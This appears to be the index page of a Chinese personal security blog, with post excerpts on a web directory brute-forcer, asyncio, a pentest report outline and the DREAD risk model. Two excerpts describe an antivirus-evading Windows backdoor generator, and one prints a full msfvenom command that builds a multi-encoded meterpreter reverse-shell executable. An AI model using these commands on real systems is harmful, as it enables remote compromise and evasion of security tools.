dork everything

| 热度 | 字数统计: 387 字 | 阅读时长: 2 分

dork 是一款 Web 目录爆破工具.

1
2
3
4
5
6
              ___   
____ __H__
| \ ___ ___|.|__ {1.4#stable}
| | | . | _|.|_/
|____/|___|_| |.|_\
V exp10it.cn

dork

feature

支持 GET/POST/HEAD 三种请求方式

自定义 Cookie, Referer, 404 keyword

根据域名组合字典 (备份)

随机 IP, User-Agent

延时时间 (bypass)

Timeout

Read More

命令行语法格式

| 热度 | 字数统计: 113 字 | 阅读时长: 1 分

之前写轮子的时候看到的, 比较有意思, 就记下来了.

命令 <必选参数1|必选参数2> [-option {必选参数1|必选参数2|必选参数3} [可选参数...]] {(默认参数)|参数1|参数2}

1
2
3
4
5
6
<> 必选参数
[] 可选参数
{} 必选参数 多选一
| 分隔多个互斥参数 多选一
() 参数默认值 只用于 {}
... 可为属性指定多个值

python asyncio

| 热度 | 字数统计: 581 字 | 阅读时长: 3 分

asyncio 是在 Python 3.4 中引入的异步 IO 标准库.

简单介绍一下什么是同步 IO / 异步 IO.

1
2
同步 IO: 你去约女朋友啪啪啪, 你需要一直等着她来, 之后你才能和她♂.
异步 IO: 你去约女朋友啪啪啪, 在她来的路上你不用一直等着, 可以去买套套什么的.

Read More

MSFvenom-NG

| 热度 | 字数统计: 85 字 | 阅读时长: 1 分
1
2
3
4
5
           ___
_____ ___| _|_ _ ___ ___ ___ _____
| |_ -| _| | | -_| | . | |
|_|_|_|___|_| \_/|___|_|_|___|_|_|_|
MSFvenom-NG

这应该会是我持续更新的一个项目.

1
2
3
MSFvenom-NG 是一款交互式 Windows (EXE/DLL Powershell) 后门生成工具

支持自定义编码规则 Bypass 杀毒软件

MSFvenom-NG

msfvenom multiple encode

| 热度 | 字数统计: 172 字 | 阅读时长: 1 分

除第一次需要指定 payload 外, 其他都用 -p - 代替, 多重编码需要指定 --platform-a 并用 -f raw 输出, 最后一次编码更改为 -f exe.

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f raw | msfvenom -p - -e x86/jmp_call_additive -i 2 -a x86 --platform windows -f raw | msfvenom -p - e x86/alpha_upper -i 1 -a x86 --platform windows -f exe > msf.exe

Read More

简单的渗透测试报告

| 热度 | 字数统计: 163 字 | 阅读时长: 1 分

这份渗透测试报告是之前帮一个朋友写的, 敏感信息已经被我抠出来了, 只有框架.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
1 项目概述

1.1 渗透测试目的
1.2 渗透测试范围
1.3 渗透测试工具
1.4 渗透测试组织
1.5 渗透测试原则

2 渗透测试方法

2.1 工具自动分析
2.2 人工手动分析
2.3 风险评估

3 网站漏洞详情

4 总结

.1 网站目前安全现状
.2 存在问题和整改建议

渗透测试报告.docx

DREAD 风险评估

| 热度 | 字数统计: 290 字 | 阅读时长: 1 分

微软的 DREAD 模型.

高危: 12-15分, 中危: 8-11分, 低危: 0-7分.

等级 高(3) 中(2) 低(1)
Damage Potential 获取完全验证权限; 执行管理员操作; 非法上传文件 泄露敏感信息 泄露其他信息
Reproducibility 攻击者可以随意再次攻击 攻击者可以重复攻击, 但有时间限制 攻击者很难重复攻击
Exploitability 初学者在短期内能掌握攻击方法 熟练的攻击者才能完成这次攻击 漏洞利用条件非常苛刻
Affected users 所有用户, 默认配置, 关键用户 部分用户, 非默认配置 极少数用户, 匿名用户
Discoverability 漏洞很明显, 攻击条件很容易获得 在私有区域, 部分人能看到, 需要深入挖掘漏洞 发现该漏洞极其困难

Read More